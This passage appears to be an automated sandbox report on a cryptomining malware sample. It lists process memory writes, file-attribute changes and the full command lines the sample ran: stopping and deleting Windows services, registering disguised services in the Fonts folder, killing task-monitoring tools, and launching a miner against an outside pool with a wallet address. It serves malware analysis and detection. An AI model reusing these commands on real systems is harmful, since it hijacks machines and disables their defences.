N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A \??\c:\windows\Fonts\KvMonXP.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2784 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2784 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2784 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 2784 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 1892 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2784 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2784 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 2784 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 2784 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 2784 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 2784 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 2784 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 2784 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 2784 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 3620 wrote to memory of 5112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3620 wrote to memory of 5112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3620 wrote to memory of 5112 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 832 wrote to memory of 4864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 832 wrote to memory of 4864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 832 wrote to memory of 4864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1584 wrote to memory of 4516 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1584 wrote to memory of 4516 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1584 wrote to memory of 4516 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1892 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1892 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1892 wrote to memory of 1812 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 512 wrote to memory of 4632 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 512 wrote to memory of 4632 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 512 wrote to memory of 4632 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1588 wrote to memory of 4460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1588 wrote to memory of 4460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1588 wrote to memory of 4460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2784 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 2784 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib -s -h -r -a %SystemRoot%\Fonts

C:\Windows\SysWOW64\net.exe

net stop Microsarver

C:\Windows\SysWOW64\sc.exe

sc delete Microsarver

C:\Windows\SysWOW64\net.exe

net stop Samsorver

C:\Windows\SysWOW64\sc.exe

sc delete Samsorver

C:\Windows\SysWOW64\net.exe

net stop lanmanserver /y

C:\Windows\SysWOW64\sc.exe

sc config lanmanserver start= DISABLED 2>nul

C:\Windows\SysWOW64\sc.exe

sc delete lanmanserver

C:\Windows\SysWOW64\net.exe

net stop mssecsvc2.0

C:\Windows\SysWOW64\sc.exe

sc delete mssecsvc2.0

C:\Windows\SysWOW64\net.exe

net stop mssecsvc2.1

C:\Windows\SysWOW64\sc.exe

sc delete mssecsvc2.1

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe install Microsarver c:\windows\Fonts\conhost.exe

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe set Microsarver DisplayName Network Location Service

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe set Microsarver Description Provides performance library information from Windows Management.

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe start Microsarver

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Microsarver

C:\Windows\SysWOW64\attrib.exe

attrib -s -h -r -a C:\Windows\Fonts

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop lanmanserver /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Samsorver

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mssecsvc2.0

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mssecsvc2.1

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"

\??\c:\windows\Fonts\conhost.exe

"c:\windows\Fonts\conhost.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib -s -h -r -a %SystemRoot%\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /im taskmgr.exe /f /T

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /im rundll32.exe /f /T

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /im autoruns.exe /f /T

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /im perfmon.exe /f /T

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /im procexp.exe /f /T

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /im ProcessHacker.exe /f /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /im taskmgr.exe /f /T

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib -s -h -r -a C:\Windows\Fonts

C:\Windows\SysWOW64\taskkill.exe

taskkill /im ProcessHacker.exe /f /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /im rundll32.exe /f /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /im autoruns.exe /f /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /im procexp.exe /f /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /im perfmon.exe /f /T

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib -s -h -r -a %SystemRoot%\Fonts

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe install Samsorver KvMonXP -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe set Samsorver DisplayName WMI Performance Services

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe set Samsorver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe start Samsorver

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe

C:\Windows\SysWOW64\attrib.exe

attrib -s -h -r -a C:\Windows\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

\??\c:\windows\Fonts\KvMonXP.exe

"KvMonXP" -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib +s +a %SystemRoot%\Fonts

C:\Windows\SysWOW64\attrib.exe

attrib +s +a C:\Windows\Fonts

